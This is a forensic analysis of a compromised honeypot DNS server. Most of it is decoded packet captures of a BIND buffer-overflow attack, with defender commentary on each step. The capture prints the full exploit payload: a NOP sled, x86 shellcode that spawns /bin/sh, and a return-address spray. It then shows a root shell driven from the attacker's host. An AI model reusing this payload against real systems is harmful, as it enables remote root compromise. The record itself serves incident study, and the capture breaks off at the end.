What you are looking at below are the decoded packets of the exploit. For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned). So, our black-hat has to determine that our victim DNS server is recursive. He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa. If successful, he will then know our DNS server is recursive. Below you see the packets of the successfull, recursive lookup of 107.71.80.216.in-addr.arpa.
04/26-06:42:59.473423
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:18856
Len:
52
95
6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01
dr.arpa.....
04/26-06:42:59.474405
172.16.1.107:1028 -> 128.8.10.90:53
UDP
TTL:64 TOS:0x0 ID:18861
Len:
52
5C
21 01 00 00 01 00 00 00 00 00 00 03 31 30 37 \!...........107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01
dr.arpa.....
04/26-06:42:59.574808
128.8.10.90:53 -> 172.16.1.107:1028
UDP
TTL:48 TOS:0x0 ID:5077
Len:
135
5C
21 81 00 00 01 00 00 00 02 00 00 03 31 30 37 \!...........107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02 dr.arpa......71.
38
30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61 80.216.IN-ADDR.a
72
70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E rpa............N
53
30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 S0.ENTERACT.COM.
C0
2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46 .,...........BIF
52
4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B ROST.SEASTROM.[
04/26-06:42:59.576169
172.16.1.107:1028 -> 198.32.64.12:53
UDP
TTL:64 TOS:0x0 ID:18862
Len:
46
87
2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .*...........BIF
52
4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO
4D
00 00 01 00 01
M.....
04/26-06:42:59.576953
172.16.1.107:1028 -> 198.32.64.12:53
UDP
TTL:64 TOS:0x0 ID:18863
Len:
42
DA
57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 .W...........NS0
08
45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM...
00
01
..
04/26-06:43:00.215765
198.32.64.12:53 -> 172.16.1.107:1028
UDP
TTL:51 TOS:0x0 ID:42900
Len:
462
87
2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46 .*...........BIF
52
4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO
4D
00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00 M......COM......
07
E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52 ......A.ROOT-SER
56
45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00 VERS.NET..&.....
07
E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00 ......G.7.&.....
07
E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52 ......F.GTLD-SER
56
45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00 VERS.D.&........
00
04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...F.7.&........
00
04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...I.7.&........
00
04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...E.7.&........
00
04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00 ...J.g.&........
00
04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00 ...K.g.&........
00
04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...A.g.&........
00
04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00 ...M.g.&........
00
04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...H.g.&........
00
04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80 ...C.g.5.....6..
00
04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80 ...)...U.....6..
00
04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00 ...p$..e........
00
04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80 .....C.......6..
00
04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80 .............6..
00
04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80 ...$.........6..
00
04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00 ................
00
04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00 ...)............
00
04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00 ....c...........
00
04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00 ...).&..........
00
04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00 ................
00
04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00 ...!KR..........
00
04 CD BC B9 12
......
04/26-06:43:00.218808
172.16.1.107:1028 -> 205.188.185.18:53
UDP
TTL:64 TOS:0x0 ID:18864
Len:
46
E6
38 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .8...........BIF
52
4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO
4D
00 00 01 00 01
M.....
04/26-06:43:00.220217
198.32.64.12:53 -> 172.16.1.107:1028
UDP
TTL:51 TOS:0x0 ID:42903
Len:
458
DA
57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30 .W...........NS0
08
45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM...
00
01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00 ...COM..........
14
01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53 ..A.ROOT-SERVERS
03
4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00 .NET..".........
04
01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00 ..G.3.".........
11
01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53 ..F.GTLD-SERVERS
C0
40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46 .@."...........F
C0
33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49 .3."...........I
C0
33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45 .3."...........E
C0
33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A .3."...........J
C0
63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B .c."...........K
C0
63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41 .c."...........A
C0
63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D .c."...........M
C0
63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48 .c."...........H
C0
63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43 .c."...........C
C0
63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29 .c.1.....6.....)
00
04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70 ...Q.....6.....p
24
04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11 $..a............
D0
43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05 .C.~.....6......
05
F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24 .........6.....$
94
11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB .........6......
E6
0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29 ...............)
00
15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08 ................
63
0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29 c..............)
03
26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0 .&..............
98
12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21 ...............!
4B
52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC KR..............
B9
12
..
04/26-06:43:00.222098
172.16.1.107:1028 -> 205.188.185.18:53
UDP
TTL:64 TOS:0x0 ID:18865
Len:
42
3D
9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 =............NS0
08
45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM...
00
01
..
04/26-06:43:00.315827
205.188.185.18:53 -> 172.16.1.107:1028
UDP
TTL:240 TOS:0x0 ID:40907 DF
Len:
147
E6
38 80 00 00 01 00 01 00 02 00 02 07 42 49 46 .8...........BIF
52
4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO
4D
00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00 M...............
00
04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03 .......SEASTROM.
63
6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C com.............
C0
36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30 .6...........NS0
08
45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00 .ENTERACT.?.....
01
00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00 ............\...
01
00 02 A3 00 00 04 CF E5 8F 03
...........
04/26-06:43:00.317904
205.188.185.18:53 -> 172.16.1.107:1028
UDP
TTL:240 TOS:0x0 ID:40908 DF
Len:
147
3D
9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30 =............NS0
08
45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM...
00
01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5 ................
8F
03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00 ...ENTERACT.com.
00
02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F ...........BIFRO
53
54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00 ST.SEASTROM.;.2.
02
00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00 ............J...
01
00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00 ................
01
00 02 A3 00 00 04 CF E5 8F 03
...........
04/26-06:43:04.462930
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:18880
Len:
52
95
6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01
dr.arpa.....
04/26-06:43:04.463599
172.16.1.107:1028 -> 192.148.252.10:53
UDP
TTL:64 TOS:0x0 ID:18866
Len:
52
F1
8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .............107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01
dr.arpa.....
04/26-06:43:04.559157
192.148.252.10:53 -> 172.16.1.107:1028
UDP
TTL:54 TOS:0x0 ID:7629
Len:
196
F1
8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .............107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa.........
00
01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi
74
7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract
03
63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216.
49
4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA....
01
00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U.
02
00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros
74
08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w..
00
01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................
00
01 00 00 0E 10 00 04 C0 94 FC 0A
............
04/26-06:43:04.560130
172.16.1.107:53 -> 213.28.22.189:1045
UDP
TTL:64 TOS:0x0 ID:18867
Len:
196
95
6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .j...........107
02
37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad
64
72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa.........
00
01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi
74
7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract
03
63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216.
49
4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA....
01
00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U.
02
00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros
74
08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w..
00
01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................
00
01 00 00 0E 10 00 04 C0 94 FC 0A
............
---- COMMENT: Tickle Worked ----
The recursvie lookup worked. Not only is our system running a vulnerable version of named, but it is recuresive. The black-hat now queries our DNS server for the name r.rsavings.net. This is extrmelly odd, why would a remote system query my DNS server for a different domain name? As we will soon learn, this is how the exploit works. Our DNS server is being suckered. Read below as our DNS server recursively attempts to find the NS for savings.net so it can query the IP Address (A record) of r.rsavings.net.
04/26-06:43:04.883506
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:18882
Len:
40
95
6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:43:04.884189
172.16.1.107:1028 -> 198.41.0.21:53
UDP
TTL:64 TOS:0x0 ID:18868
Len:
40
F7
F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .............r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:43:04.969435
198.41.0.21:53 -> 172.16.1.107:1028
UDP
TTL:244 TOS:0x0 ID:56421 DF
Len:
202
F7
F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72 .............r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
08
52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02 .RSAVINGS.NET...
00
01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44 .........NS3.MYD
4F
4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01 OMAIN.COM.. ....
00
02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02 .......NS4.<. ..
00
01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20 .........WWW. .
00
02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32 ...........SERV2
C0
20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22 . .8..........."
59
03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..V..........."
59
04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2 Y..h..........?.
51
0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2 Q..z..........?.
51
0C
Q.
04/26-06:43:04.970963
172.16.1.107:1028 -> 198.41.3.38:53
UDP
TTL:64 TOS:0x0 ID:18869
Len:
42
C2
4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34 .N...........NS4
08
4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM...
00
01
..
04/26-06:43:04.971751
172.16.1.107:1028 -> 198.41.3.38:53
UDP
TTL:64 TOS:0x0 ID:18870
Len:
42
F2
0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33 .............NS3
08
4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM...
00
01
..
04/26-06:43:04.972052
172.16.1.107:1028 -> 63.226.81.13:53
UDP
TTL:64 TOS:0x0 ID:18871
Len:
40
0C
BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .............r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:43:05.063551
198.41.3.38:53 -> 172.16.1.107:1028
UDP
TTL:242 TOS:0x0 ID:42903 DF
Len:
202
C2
4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34 .N...........NS4
08
4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM...
00
01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............."
59
04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM.
00
02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32 ...........NS1.2
C0
32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32 .2...........NS2
C0
32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E .2.2...........N
53
33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 S3.2.2..........
C0
0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22 ...J..........."
59
01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..\..........."
59
02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..n..........."
59
03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y.............."
59
04
Y.
04/26-06:43:05.065790
198.41.3.38:53 -> 172.16.1.107:1028
UDP
TTL:242 TOS:0x0 ID:42904 DF
Len:
202
F2
0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33 .............NS3
08
4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01 .MYDOMAIN.COM...
00
01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 ..............."
59
03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 Y..MYDOMAIN.COM.
00
02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32 ...........NS1.2
C0
32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32 .2...........NS2
C0
32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C .2.2............
C0
32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34 .2...........NS4
C0
32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22 .2.J..........."
59
01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..\..........."
59
02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y.............."
59
03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22 Y..|..........."
59
04
Y.
--- COMMENT: Buffer Overflow! ---
Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer. However, we get a TCP connection instead, which isused the buffer overflow attack. The following packets are the actual buffer overflow attack. Notice the '/bin/sh' script ran at the end of the buffer overflow. That is the whole purpose of the exploit. NOTE: Based on passive fingerprinting, another forensic tool, this system also appears to be Linux box.
04/26-06:43:05.096725
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:49 TOS:0x0 ID:26472 DF
**S*****
Seq: 0x45B8E7 Ack: 0x0 Win: 0x7D78
TCP
Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0
04/26-06:43:05.097443
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18872 DF
**S***A*
Seq: 0x3FA07873 Ack: 0x45B8E8 Win: 0x7D78
TCP
Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0
04/26-06:43:05.204503
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26473 DF
******A*
Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP
Options => NOP NOP TS: 4037599 144023498
04/26-06:43:05.205940
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26474 DF
*****PA*
Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP
Options => NOP NOP TS: 4037599 144023498
19
C8
..
04/26-06:43:05.206168
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18873 DF
******A*
Seq: 0x3FA07874 Ack: 0x45B8EA Win: 0x7D78
TCP
Options => NOP NOP TS: 144023509 4037599
04/26-06:43:05.244101
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26475 DF
*****PA*
Seq: 0x45B8EA Ack: 0x3FA07874 Win: 0x7D78
TCP
Options => NOP NOP TS: 4037599 144023498
0C
BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72 .............r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
01
72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 .r.rsavings.net.
00
01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72 .......,.......r
08
72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E .rsavings.net...
00
01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D .....,.k..admadm
00
00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
... repeated noops (0x90) removed for brevity sake ---
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC ................
01
00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E ...^.v..F..F..F.
89
46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00 .F.V.T^.........
00
00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF ..........P.^...
01
00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00 ....'......^..=.
00
00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06 ....[S.......[..
00
00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89 ......^.........
F3
B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E ..=......,......
00
41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F .ADMROCKS.../../
2E
2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E ../../../../../.
2E
2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0 ./../.^.........
85
C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18 ...........N..V.
B8
0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75 ...............u
00
00 00 10 00 00 00 00 00 00 00 74 68 69 73 69 ...........thisi
73
73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F ssometempspacefo
72
74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E rthesockinaddrin
79
65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69 yeahyeahiknowthi
73
69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79 sislamebutanyway
77
68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67 whocareshorizong
6F
74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C otitworkingsoall
69
73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46 iscool..^V.F.P.F
04
50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00 .P.F.........f..
00
CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08 ..........u.f.~.
02
75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8 .u..V.JR........
3F
00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8 ?.....ZR........
3F
00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8 ?.....ZR........
3F
00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46 ?.......^FFFFF.F
10
00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8 ................
4F
FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF O.../bin/sh.-c..
FF
FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 ................
70
6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39 plaguez[ADM]10/9
39
2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90 9-exit..........
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90
90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF ................
C3
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................
C3
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................
C3
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................
C3
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF ................
C3
D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00 ................
00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00
00 00 00 00 00 00 00
........
.
--- COMMENT: The script ---
Now that the buffer overflow has been launched, we have a root shell. Something must be done with that rootshell. Our black-hat runs the following commands with that shell. He first confirms the system architecture (uname -a) and the shell uid (id). He then inserts two accounts onto the system, twin and hantu.
04/26-06:43:05.483639
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18876 DF
******A*
Seq: 0x3FA07874 Ack: 0x45D2B2 Win: 0x7C70
TCP
Options => NOP NOP TS: 144023537 4037617
04/26-06:43:06.219868
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26480 DF
*****PA*
Seq: 0x45D2B2 Ack: 0x3FA07874 Win: 0x7D78
TCP
Options => NOP NOP TS: 4037700 144023537
63
64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
70
77 64 3B 20 69 64 3B 0A
pwd; id;.
04/26-06:43:06.233691
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18877 DF
******A*
Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP
Options => NOP NOP TS: 144023612 4037700
04/26-06:43:06.236460
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18878 DF
*****PA*
Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP
Options => NOP NOP TS: 144023612 4037700
4C
69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63 Linux apollo.uic
6D
62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35 mba.edu 2.2.5-15
20
23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32 #1 Mon Apr 19
2
32
3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39 2:21:09 EDT 1999
20
69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A
i586 unknown.
04/26-06:43:06.346489
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26482 DF
******A*
Seq: 0x45D2CB Ack: 0x3FA078C2 Win: 0x7D78
TCP
Options => NOP NOP TS: 4037713 144023612
04/26-06:43:06.346819
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18879 DF
*****PA*
Seq: 0x3FA078C2 Ack: 0x45D2CB Win: 0x7C70
TCP
Options => NOP NOP TS: 144023623 4037713
2F
0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 /.uid=0(root) gi
64
3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 d=0(root) groups
3D
30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C =0(root),1(bin),
32
28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29 2(daemon),3(sys)
2C
34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C ,4(adm),6(disk),
31
30 28 77 68 65 65 6C 29 0A
10(wheel).
04/26-06:43:06.486257
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26483 DF
******A*
Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4037727 144023623
04/26-06:43:09.880779
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:18907
Len:
40
95
6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:43:19.875096
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:18941
Len:
40
95
6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r
73
61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:43:39.856657
213.28.22.189:1045 -> 172.16.1.107:53
UDP
TTL:40 TOS:0x0 ID:19019
Len:
40
95
6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72 .k...........r.r
73
